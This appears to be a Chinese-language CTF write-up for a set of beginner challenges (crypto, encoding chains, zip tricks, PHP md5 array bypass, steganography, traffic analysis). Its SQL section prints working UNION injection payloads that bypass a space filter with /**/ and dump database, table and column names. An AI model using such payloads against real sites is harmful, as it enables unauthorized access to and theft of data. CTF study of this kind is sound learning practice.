1.RSA
先把e的值转化为十六进制
获得d值
2.徐江的嘲讽
直接把zip拖去010,发现00全局方式位标记处没有全为00,手动更改为00,再打开zip,就无需密码打开
3.凯撒密码
即可
4.简单的密码
1.打开进去,都是社会主义核心价值观,去相关解码器解码
2.得出各种姓,去百家姓解码器
3.得出一串数据,去base16解码,得出flag
5.php
主要是读懂代码,并且知道md5.强弱比较(数组绕过法)
可知 0=a 1=b 且用get传参
即可得
5.sql
可先随便输入用户名和密码,用bp抓包,看看闭合方式,还可看到使用万能密码的实质。
1.先输入 ' or 1=1#,发现报错
2.观察代码可知,过滤了空格
3.用/**/来代替空格,成功发送
4.接着开始查询数据库,表名,列名
0'/**/union/**/select/**/database(),3,1#
#得到yunxi_exam
0'/**/union/**/select/**/group_concat(table_name),2,1/**/from/**/information_schema.tables/**/where/**/table_schema='yunxi_exam'#
#bighacker,users
0'/**/union/**/select/**/group_concat(column_name),2,1/**/from/**/information_schema.columns/**/where/**/table_name='bighacker'#
hack1,hack2,hack3
0'/**/union/**/select/**/group_concat(hack1,hack2,hack3),2,1/**/from/**/bighacker#
#得到flag
最后得到flag时,页面无法显示完全,右键查看源代码
6.music
去Audacity.无果
去搞MP3sto
再打开TXT,即可得到flag
8.life story
直接拖去010,看见一堆奇怪的数字。推测是某种密, 去百度,然后python去空。
先去十六进制解码,去emoji解,去base32,再去base64
即得flag
9.今天你学习了吗
根据提示可得,需要修改图片大小,先去图片属性看图片大小,转换成十六进制,为400 400。
去010看,直接修改,保存打开,即得flag
10.驴哥
1.打开压缩包需要密码,直接爆破密码,先从数字0~9,数位为1~8,直接就能得出密码
2.打开文件,打开图片的属性,发现里面有一串字母
3.拿去base64解密
11.怎么只会贝斯拿不下你
先把后缀名改为zip,发现记事本里面有一串字符,并且最后还有四个=,猜测是base加密
先16
最后64,即可得flag
12.流量分析
1.直接拖去wireshark,查看HTTP有什么异常
看见那个JPEG JFIF image 非常可疑,直接点开
就看见flag了
13.nc
题目直接提示了要用netcat来做,直接去虚拟机打开kali
即可得flag
13.pwn 14.reverse
未完待续